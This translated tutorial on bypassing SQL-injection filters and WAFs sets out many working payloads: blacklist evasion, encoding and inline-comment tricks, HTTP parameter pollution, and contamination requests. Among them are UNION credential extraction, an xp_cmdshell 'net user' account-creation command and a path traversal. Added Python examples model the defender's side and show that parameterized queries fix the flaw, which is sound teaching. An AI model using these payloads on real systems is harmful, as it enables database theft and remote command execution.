Some notes on SQL injection bypasses
<p><span><strong>I. Approach to bypassing a WAF</strong></span></p>
<p>Start from the first filtering step, analyse each one in turn, and then bypass it.</p>
<p><strong>1. Filtering and, or</strong></p>
<pre><code class="sql">preg_match('/(and|or)/i', $id)
Filtered injection: 1 or 1 = 1    1 and 1 = 1
Bypassed injection: 1 || 1 = 1    1 && 1 = 1
</code></pre>
<p><strong>2. Filtering and, or, union</strong></p>
<pre><code class="sql">preg_match('/(and|or|union)/i', $id)
Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'
</code></pre>
<p><strong>3. Filtering and, or, union, where</strong></p>
<pre><code class="sql">preg_match('/(and|or|union|where)/i', $id)
Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'
</code></pre>
<p><strong>4. Filtering and, or, union, where, limit</strong></p>
<pre><code class="sql">preg_match('/(and|or|union|where|limit)/i', $id)
Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
</code></pre>
<p><strong>5. Filtering and, or, union, where, limit, group by</strong></p>
<pre><code class="sql">preg_match('/(and|or|union|where|limit|group by)/i', $id)
Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
</code></pre>
<p><strong>6. Filtering and, or, union, where, limit, group by, select</strong></p>
<pre><code class="sql">preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Filtered injection: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user,1,1) = 'a'
</code></pre>
<p><strong>7. Filtering and, or, union, where, limit, group by, select, '</strong></p>
<pre><code class="sql">preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Filtered injection: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)
</code></pre>
<p><strong>8. Filtering and, or, union, where, limit, group by, select, ', hex</strong></p>
<pre><code class="sql">preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
</code></pre>
<p><strong>9. Filtering and, or, union, where, limit, group by, select, ', hex, substr</strong></p>
<pre><code class="sql">preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)
</code></pre>
<p><strong>10. Filtering and, or, union, where, limit, group by, select, ', hex, substr, whitespace</strong></p>
<pre><code class="sql">preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Filtered injection: 1 || lpad(user,7,1)
Bypassed injection: 1%0b||%0blpad(user,7,1)
</code></pre>
<p><span><strong>II. Regex bypass</strong></span></p>
<p>Bypass based on the regex's fuzzy-matching behaviour, for example when '=' is filtered:</p>
<p><code>filtered injection: 1 or 1 = 1</code></p>
<p><code>Bypassed injection: 1 or 1,1 or '1',1 or char(97)</code></p>
<pre><code class="sql">e.g.:
filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
</code></pre>
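<p>The ten-step progression of section I and the operator substitutions of section II make the same point from the defender's side: every keyword added to the blacklist is answered by a payload that does not contain it, and the regex never addresses the root cause. The following is an added example, not code from the page: it ports the ten <code>preg_match</code> patterns from section I to Python's <code>re</code>, records at which step each of the page's "bypassed" payloads is finally stopped, and contrasts string concatenation with a parameterized query on a constructed SQLite table (the <code>users</code> rows and the function names are assumptions of this example). One caveat it makes visible: Python's <code>\s</code> matches the vertical tab (0x0B), so the <code>%0b</code> payload from step 10 is blocked here, whereas whether PHP's <code>preg_match</code> blocks it depends on the bundled PCRE version (VT joined <code>\s</code> in PCRE 8.34); a blacklist's behaviour is engine-specific and has to be tested on the engine that actually runs it.</p>

```python
import re
import sqlite3

# The ten blacklists from section I of the page, ported from
# preg_match('/(...)/i', $id) to Python's re module (case-insensitive).
STEP_PATTERNS = [
    r"(and|or)",
    r"(and|or|union)",
    r"(and|or|union|where)",
    r"(and|or|union|where|limit)",
    r"(and|or|union|where|limit|group by)",
    r"(and|or|union|where|limit|group by|select)",
    r"(and|or|union|where|limit|group by|select|')",
    r"(and|or|union|where|limit|group by|select|'|hex)",
    r"(and|or|union|where|limit|group by|select|'|hex|substr)",
    r"(and|or|union|where|limit|group by|select|'|hex|substr|\s)",
]
STEP_FILTERS = [re.compile(p, re.I) for p in STEP_PATTERNS]


def first_blocking_step(value: str):
    """Return the 1-based step whose blacklist first rejects `value`,
    or None if even the step-10 blacklist lets it through."""
    for step, pattern in enumerate(STEP_FILTERS, start=1):
        if pattern.search(value):
            return step
    return None


# The "bypassed injection" payload from each of steps 1-10 on the page
# (step 6 lists two; the substr one is used here).
PAGE_BYPASSES = [
    "1 || 1 = 1",
    "1 || (select user from users where user_id = 1) = 'admin'",
    "1 || (select user from users limit 1) = 'admin'",
    "1 || (select user from users group by user_id having user_id = 1) = 'admin'",
    "1 || (select substr(group_concat(user_id),1,1) user from users) = 1",
    "1 || substr(user,1,1) = 'a'",
    "1 || substr(user,1,1) = unhex(61)",
    "1 || substr(user,1,1) = lower(conv(11,10,36))",
    "1 || lpad(user,7,1)",
    "1\x0b||\x0blpad(user,7,1)",  # %0b URL-decoded: vertical tab instead of space
]


def arms_race() -> list:
    """Pair each page payload with the step that finally blocks it. Each
    payload survives at least the step it was written for; adding one more
    keyword to the regex only moves the problem along by one step."""
    return [(p, first_blocking_step(p)) for p in PAGE_BYPASSES]


def make_db() -> sqlite3.Connection:
    """Constructed sample data for this example (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "admin"), (2, "bob"), (3, "carol")])
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    """String concatenation: the input is parsed as SQL, which is the only
    reason a keyword blacklist is being attempted in the first place."""
    return conn.execute(f"SELECT user FROM users WHERE user_id = {user_id}").fetchall()


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    """Parameter binding: the input is a value, never SQL text, so the
    step-1 payload is just a string that matches no user_id."""
    return conn.execute("SELECT user FROM users WHERE user_id = ?", (user_id,)).fetchall()


if __name__ == "__main__":
    for payload, step in arms_race():
        print(f"blocked at step {step}: {payload!r}")
    db = make_db()
    print(vulnerable_lookup(db, "1 or 1 = 1"))  # every row comes back
    print(safe_lookup(db, "1 or 1 = 1"))        # no row matches
```

<p>Run as a script it prints the step at which each payload is stopped; note that <code>1 || 1 = 1</code> survives until step 10, because <code>||</code> itself is never filtered and only the whitespace rule catches it. The lookup functions show why this does not matter once the query is parameterized: the same string that returns every row through concatenation returns nothing through a bound parameter, with no regex involved.</p>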
<p><span><strong>III. General bypasses</strong></span></p>
<p><strong>1. Comment symbols</strong></p>
<pre><code class="sql">?id=1+un//ion+se//lect+1,2,3--
</code></pre>
<p><strong>2. Case variation</strong></p>
<pre><code class="sql">?id=1+UnIoN//SeLecT//1,2,3--
</code></pre>
<p><strong>3. Keyword replacement</strong></p>
<p>Some WAFs use preg_replace to strip SQL keywords:</p>
<pre><code class="sql">?id=1+UNunionION+SEselectLECT+1,2,3--
?id=1+uni%0bon+se%0blect+1,2,3--
</code></pre>
<p>Sometimes the comment sequence '/**/' is filtered too; %0b can be used to get around that as well:</p>
<pre><code class="sql">Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed : http://localhost/id/1%0b||%0blpad(first_name,7,1).html
</code></pre>
<p><strong>4. Encoding</strong></p>
<p>A classic script: Nukesentinel.php</p>
<pre><code class="php">// Check for UNION attack
// Copyright 2004(c) Raven PHP Scripts
$blocker_row = $blocker_array;
if($blocker_row['activate'] > 0) {
  // literal substring checks on the query string as received;
  // an encoded form of the same sequence is not matched
  if (stristr($nsnst_const['query_string'],'+union+') OR
      stristr($nsnst_const['query_string'],'%20union%20') OR
      stristr($nsnst_const['query_string'],'*/union/*') OR
      stristr($nsnst_const['query_string'],' union ') OR
      stristr($nsnst_const['query_string_base64'],'+union+') OR
      stristr($nsnst_const['query_string_base64'],'%20union%20') OR
      stristr($nsnst_const['query_string_base64'],'*/union/*') OR
      stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row);
    die("BLOCK IP 1 ");
  }
}
</code></pre>
<pre><code class="sql">Forbidden: http://localhost/php/?/**/union/**/select
Bypassed : http://localhost/php/?/%2A%2A/union/%2A%2A/select
Bypassed : http://localhost/php/?%2f**%2funion%2f**%2fselect
</code></pre>
<p><strong>5. Buffer overflow</strong></p>
<pre><code class="sql">http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
</code></pre>
<p><strong>6. Inline comments (MySQL)</strong></p>
<pre><code class="sql">http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
</code></pre>
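<p>Items 2, 3, 4 and 6 of this section share one defensive lesson: a check that looks at the request bytes as received (the NukeSentinel snippet matches literal <code>*/union/*</code> and <code>' union '</code>) sees something different from what the database parser will see after URL decoding, comment handling, case folding and whitespace normalization, and a filter that deletes matches once can be made to reassemble the very keyword it deleted. The following added example (not code from the page or from NukeSentinel) contrasts the raw-substring check with a normalize-then-inspect check, and single-pass deletion with deletion repeated to a fixpoint, using the page's own encoded, inline-comment and <code>UNunionION</code> inputs. The needle list is copied from the snippet above; the normalization steps, the <code>union ... select</code> rule and the function names are assumptions of this example.</p>

```python
import re
from urllib.parse import unquote_plus

# The literal needles the NukeSentinel snippet looks for in the query string
NUKESENTINEL_NEEDLES = ("+union+", "%20union%20", "*/union/*", " union ")


def raw_check(query_string: str) -> bool:
    """NukeSentinel-style check: case-insensitive substring match on the
    query string exactly as received, without decoding it."""
    low = query_string.lower()
    return any(needle in low for needle in NUKESENTINEL_NEEDLES)


def normalize(query_string: str) -> str:
    """Canonicalize a query-string value towards what the database parser
    will see: URL-decode (bounded loop, so %252A -> %2A -> * is caught),
    keep the body of MySQL executable comments /*!...*/, drop ordinary
    /*...*/ comments, fold all whitespace (VT 0x0B included) to one space,
    and lower-case."""
    s = query_string
    for _ in range(3):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # VT/FF/NBSP listed explicitly so the intent survives porting to an
    # engine whose \s does not cover them
    s = re.sub(r"[\s\x0b\x0c\xa0]+", " ", s)
    return s.strip().lower()


# Constructed rule for this example: a UNION ... SELECT shape
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b")


def normalized_check(query_string: str) -> bool:
    """Same goal as raw_check, applied to the normalized form instead."""
    return UNION_SELECT.search(normalize(query_string)) is not None


KEYWORDS = re.compile(r"union|select", re.I)


def strip_once(value: str) -> str:
    """Single-pass deletion, the preg_replace behaviour from item 3:
    removing the inner match leaves the outer characters to re-form it."""
    return KEYWORDS.sub("", value)


def strip_to_fixpoint(value: str) -> str:
    """Delete until nothing changes, so a removed keyword cannot leave a
    new one behind. Still a blacklist: parameterized queries remain the fix."""
    while True:
        stripped = KEYWORDS.sub("", value)
        if stripped == value:
            return value
        value = stripped


if __name__ == "__main__":
    for q in ("/**/union/**/select", "/%2A%2A/union/%2A%2A/select",
              "1/*!UnIoN*/SeLecT+1,2,3--"):
        print(f"{q!r}: raw={raw_check(q)} normalized={normalized_check(q)}")
    print(strip_once("1+UNunionION+SEselectLECT+1,2,3--"))
    print(strip_to_fixpoint("1+UNunionION+SEselectLECT+1,2,3--"))
```

<p>The raw check flags the <code>/**/union/**/select</code> form but not its <code>%2A%2A</code> or <code>/*!UnIoN*/</code> variants; after normalization all three reduce to <code>union select</code>. <code>strip_once</code> turns the page's <code>UNunionION+SEselectLECT</code> into <code>UNION+SELECT</code>, which is exactly the transformation item 3 relies on, while the fixpoint version leaves no keyword behind. Decoding is bounded rather than unbounded so a pathological input cannot keep the loop busy, and the normalized text is what a detection rule or log line should record, since that is the text the backend actually parsed.</p>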
<p><span><strong>IV. Advanced bypasses</strong></span></p>
<p><strong>1. HPP (HTTP parameter pollution)</strong></p>
<p>For example:</p>
<pre><code class="plain">index.php?par1=val1&par1=val2
</code></pre>
<table>
<thead><tr><th>web server</th><th>par1</th></tr></thead>
<tbody>
<tr><td>ASP.NET/IIS</td><td>val1,val2</td></tr>
<tr><td>ASP/IIS</td><td>val1,val2</td></tr>
<tr><td>PHP/Apache</td><td>val2</td></tr>
<tr><td>JSP/Tomcat</td><td>val1</td></tr>
</tbody>
</table>
<p>
For example, under ASP/ASP.NET, where every occurrence is joined with a comma, a WAF that inspects each <code>q</code> on its own sees only fragments, while the application receives the reassembled statement. The <code>/*&q=*/</code> form goes further: the commas that the server inserts land inside SQL comments, so the fragments join without stray punctuation:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_348374">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">Forbidden: http://localhost/search.aspx?q=</code><code class="sql keyword">select</code> <code class="sql keyword">name</code><code class="sql plain">,</code><code class="sql keyword">password</code> <code class="sql keyword">from</code> <code class="sql plain">users</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Bypassed : http://localhost/search.aspx?q=</code><code class="sql keyword">select</code> <code class="sql keyword">name</code><code class="sql plain">&q=</code><code class="sql keyword">password</code> <code class="sql keyword">from</code> <code class="sql plain">users</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Bypassed : http://localhost/search.aspx?q=</code><code class="sql keyword">select</code><code class="sql plain">/*&q=*/</code><code class="sql keyword">name</code><code class="sql plain">&q=</code><code class="sql keyword">password</code><code class="sql plain">/*&q=*/</code><code class="sql keyword">from</code><code class="sql plain">/*&q=*/users</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">Bypassed : http://localhost/news.aspx?id=1'; /*&id=1*/ </code><code class="sql keyword">EXEC</code> <code class="sql plain">/*&id=1*/ master..xp_cmdshell /*&id=1*/ net </code><code class="sql color2">user</code> <code class="sql plain">test test /*&id=1*/ </code><code class="sql comments">--</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
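<p>
The folding behaviour shown in the HPP table, as an added Python example that is not from the original article: it models how each server family merges a repeated parameter, a naive WAF rule that inspects every occurrence separately, and a backend-aware check that folds the parameters the way the target will (and strips the comments the <code>/*&q=*/</code> trick relies on) before matching. The <code>SELECT ... FROM</code> signature, the policy map and the sample query strings are assumptions made for this illustration.</p>

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl

# How each server family folds a parameter that occurs more than once
# (the HPP table above); "concat" joins all occurrences with a comma.
JOIN_POLICY = {
    "ASP.NET/IIS": "concat",
    "ASP/IIS": "concat",
    "PHP/Apache": "last",
    "JSP/Tomcat": "first",
}

# Hypothetical WAF signature (an assumption for this example): SELECT ... FROM in one value.
SQLI_RULE = re.compile(r"\bselect\b.*\bfrom\b", re.I | re.S)


def split_params(query: str) -> list[tuple[str, str]]:
    """Split a query string into (name, value) pairs, keeping every duplicate."""
    return parse_qsl(query, keep_blank_values=True)


def merge_params(pairs: list[tuple[str, str]], policy: str) -> dict[str, str]:
    """Collapse duplicate names the way the chosen server family does."""
    merged: dict[str, str] = {}
    for name, value in pairs:
        if name not in merged:
            merged[name] = value
        elif policy == "concat":
            merged[name] += "," + value
        elif policy == "last":
            merged[name] = value
        # "first": the value already stored wins
    return merged


def strip_sql_comments(sql: str) -> str:
    """Drop /* ... */ comments, which is where the server-inserted commas end up."""
    return re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)


def per_value_waf(query: str) -> bool:
    """Naive WAF: run the signature over each parameter occurrence on its own."""
    return any(SQLI_RULE.search(value) for _, value in split_params(query))


def backend_aware_waf(query: str, server: str) -> bool:
    """Hardened check: fold duplicates as the backend will, strip comments, then match."""
    merged = merge_params(split_params(query), JOIN_POLICY[server])
    return any(SQLI_RULE.search(strip_sql_comments(v)) for v in merged.values())


if __name__ == "__main__":
    # Constructed request: the comment-wrapped "Bypassed" URL from the list above.
    query = "q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users"
    for server, policy in JOIN_POLICY.items():
        print(f"{server:12} receives q={merge_params(split_params(query), policy)['q']!r}")
    print("per-value WAF flags it:", per_value_waf(query))
    print("backend-aware WAF flags it for ASP.NET/IIS:", backend_aware_waf(query, "ASP.NET/IIS"))
```

<p>
The practical point is that a WAF cannot decide what a request means without knowing how the backend resolves duplicates: the same payload is an injection on ASP.NET/IIS and an inert fragment on PHP or Tomcat.</p>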
<p>
<strong>2. HPC (HTTP Parameter Contamination)</strong></p>
<p>
HTTP Parameter Contamination relies on characters that the URI grammar treats as special or forbidden, which each server decodes or sanitises in its own way. RFC 2396 (since replaced by RFC 3986) divides URI characters into these classes:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_777490">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">Unreserved: a-z, A-Z, 0-9 and - _ . ! ~ * ' ( )</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Reserved  : ; / ? : @ & = + $ ,</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Unwise    : { } | \ ^ [ ] `</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
Web servers also apply different logic when they parse a deliberately malformed query string. The table lists the behaviour recorded for Apache 2.2.16 with PHP 5.3.3 and for IIS 6 with ASP (PHP rewrites an unclosed <code>[</code>, a space or a dot in a parameter name to <code>_</code>; IIS/ASP silently drops a <code>%</code> that does not start a valid escape):</p>
<table>
<thead><tr><th>Query string</th><th>Apache/2.2.16, PHP/5.3.3</th><th>IIS6/ASP</th></tr></thead>
<tbody>
<tr><td>?test[1=2</td><td>test_1=2</td><td>test[1=2</td></tr>
<tr><td>?test=%</td><td>test=%</td><td>test=</td></tr>
<tr><td>?test%00=1</td><td>test=</td><td>test=1</td></tr>
<tr><td>?test=1%001</td><td>NULL</td><td>test=1</td></tr>
<tr><td>?test+d=1+2</td><td>test_d=1 2</td><td>test d=1 2</td></tr>
</tbody></table>
<p>
Examples. The first pair relies on PHP rewriting the unclosed <code>[</code> in a parameter name to <code>_</code>, so the name the WAF sees (<code>xp[cmdshell</code>) is not the name the application sees. The rest rely on IIS/ASP discarding a <code>%</code> that does not start a valid escape, so <code>.%./</code> becomes <code>../</code> and <code>se%lect</code> becomes <code>select</code> only after the request has passed the filter:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_513731">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">Forbidden: http://localhost/?xp_cmdshell</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Bypassed : http://localhost/?xp[cmdshell</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Forbidden: http://localhost/test.asp?file=../flag.txt</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">Bypassed : http://localhost/test.asp?file=.%./flag.txt</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">Forbidden: http://localhost/news.asp?id=10 </code><code class="sql color1">and</code> <code class="sql plain">1=0/(</code><code class="sql keyword">select</code> <code class="sql keyword">top</code> <code class="sql plain">1 table_name </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.tables)</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">Bypassed : http://localhost/news.asp?id=10 a%nd 1=0/(se%lect </code><code class="sql keyword">top</code> <code class="sql plain">1 ta%ble_name fr%om info%rmation_schema.tables)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
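<p>
The decoding and name-mangling differences above, as an added Python example that is not part of the original article: it models the two server behaviours the table records (IIS/ASP discarding a malformed <code>%</code>; PHP rewriting an unclosed <code>[</code>, a space or a dot in a parameter name to <code>_</code>) and runs a hypothetical keyword rule over a request both as a WAF doing only standard decoding sees it and as each backend sees it. The keyword rule, the backend labels and the sample requests are assumptions made for this illustration; the sample requests are the ones listed above.</p>

```python
from __future__ import annotations

import re
from urllib.parse import unquote

# A '%' that does not start a valid two-hex-digit escape.
BAD_PERCENT = re.compile(r"%(?![0-9A-Fa-f]{2})")

# Hypothetical WAF keyword rule (an assumption for this example, not the page's rule).
KEYWORDS = re.compile(r"\b(select|and|from|xp_cmdshell)\b|\.\./", re.I)


def split_raw(query: str) -> list[tuple[str, str]]:
    """Split 'a=1&b=2' into raw (name, value) pairs with no decoding at all."""
    pairs = []
    for part in query.lstrip("?").split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs


def decode_strict(s: str) -> str:
    """Standard decoding: '+' is a space, a malformed '%' is kept literally."""
    return unquote(s.replace("+", " "))


def decode_iis_lenient(s: str) -> str:
    """IIS/ASP-style decoding from the table above: a malformed '%' is dropped,
    so 'se%lect' becomes 'select' and '.%./' becomes '../'."""
    return unquote(BAD_PERCENT.sub("", s.replace("+", " ")))


def php_param_name(name: str) -> str:
    """PHP's mangling of a parameter name into a $_GET key, as in the table above:
    leading spaces are dropped, '.' and ' ' become '_', an unclosed '[' becomes '_'."""
    head, bracket, tail = name.lstrip(" ").partition("[")
    head = re.sub(r"[ .]", "_", head)
    if bracket and "]" not in tail:
        bracket = "_"
    return head + bracket + tail


def waf_hits(query: str, backend: str) -> list[str]:
    """Normalise the query the way `backend` will, then return every token the rule matched.
    backend is "IIS/ASP", "PHP/Apache" or "strict" (a WAF that only does standard decoding)."""
    hits = []
    for raw_name, raw_value in split_raw(query):
        if backend == "IIS/ASP":
            name, value = decode_iis_lenient(raw_name), decode_iis_lenient(raw_value)
        elif backend == "PHP/Apache":
            name, value = php_param_name(decode_strict(raw_name)), decode_strict(raw_value)
        else:
            name, value = decode_strict(raw_name), decode_strict(raw_value)
        for text in (name, value):
            hits.extend(m.group(0).lower() for m in KEYWORDS.finditer(text))
    return hits


if __name__ == "__main__":
    # Constructed request: the last "Bypassed" URL from the list above.
    payload = "id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)"
    print("strict-decoding WAF sees:", waf_hits(payload, "strict"))
    print("IIS/ASP backend sees    :", waf_hits(payload, "IIS/ASP"))
    print("PHP turns xp[cmdshell into:", php_param_name("xp[cmdshell"))
```

<p>
A WAF in front of IIS/ASP therefore has to decode with the same leniency as the backend (or reject malformed escapes outright), and one in front of PHP has to inspect the mangled parameter name rather than the raw one; matching keywords against the bytes on the wire is not enough.</p>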
<p>
<span><strong>Summary</strong></span></p>
<p>
The above is a round-up of techniques for bypassing SQL injection filters. I hope it is of some help in your study or work; if you have questions, leave a comment. Thank you for your support.</p>
<p>
Original article: http://byd.dropsec.xyz/2017/03/21/SQL注入-绕过/</p>